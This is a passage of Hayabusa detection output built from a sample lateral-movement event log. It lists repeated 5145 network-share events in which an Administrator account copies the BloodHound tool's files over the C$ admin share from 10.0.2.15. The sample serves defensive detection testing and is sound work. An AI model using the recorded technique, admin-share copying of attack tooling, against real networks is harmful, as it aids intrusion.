\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 